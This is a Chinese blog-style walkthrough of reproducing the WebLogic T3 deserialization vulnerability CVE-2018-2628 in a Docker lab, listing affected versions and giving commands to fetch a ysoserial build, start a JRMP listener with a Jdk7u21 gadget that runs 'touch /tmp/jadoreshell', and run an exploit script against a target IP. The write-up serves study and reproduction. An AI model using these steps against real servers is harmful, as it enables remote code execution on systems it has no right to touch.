溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

發(fā)布時(shí)間:2021-12-28 17:39:24 來源:億速云 閱讀:185 作者:柒染 欄目:安全技術(shù)

本篇文章給大家分享的是有關(guān)怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

漏洞描述:

Weblogic Server中的RMI 通信使用T3協(xié)議在Weblogic Server和其它Java程序(客戶端或者其它Weblogic Server實(shí)例)之間傳輸數(shù)據(jù), 服務(wù)器實(shí)例會(huì)跟蹤連接到應(yīng)用程序的每個(gè)Java虛擬機(jī)(JVM)中, 并創(chuàng)建T3協(xié)議通信連接, 將流量傳輸?shù)絁ava虛擬機(jī). T3協(xié)議在開放WebLogic控制臺(tái)端口的應(yīng)用上默認(rèn)開啟. 攻擊者可以通過T3協(xié)議發(fā)送惡意的的反序列化數(shù)據(jù), 進(jìn)行反序列化, 實(shí)現(xiàn)對(duì)存在漏洞的weblogic組件的遠(yuǎn)程代碼執(zhí)行攻擊。

影響版本:

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

復(fù)現(xiàn)步驟:

  1. 啟動(dòng)漏洞環(huán)境

命令:docker-compose up -d

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

  1. 下載反序列化工具

命令:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

1.啟動(dòng)JRMP Server,利用監(jiān)聽在連接成功后靶機(jī)上創(chuàng)建jadoreshell

命令:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar  ysoserial.exploit.JRMPListener 8889 Jdk7u21 "touch /tmp/jadoreshell"

2.使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一個(gè)payload字符串,因?yàn)橐獙?shí)現(xiàn)Weblogic遠(yuǎn)程調(diào)用攻擊機(jī)主機(jī)上的方法。就需要知道遠(yuǎn)程方法所在的主機(jī)地址和端口號(hào)。所以在上一步要記錄攻擊主機(jī)的信息。怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

3.替換腳本里的payload以及目標(biāo)IP地址

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

4.執(zhí)行python腳本

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

5.查看是否寫入文本文件

命令:dockers  ps

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

命令:docker exec -ti cve-2018-2628_weblogic_1  /bin/bash

命令:ls -al /tmp

怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析

文件寫入成功

以上就是怎么實(shí)現(xiàn)Weblogic反序列化漏洞CVE-2018-2628的分析,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI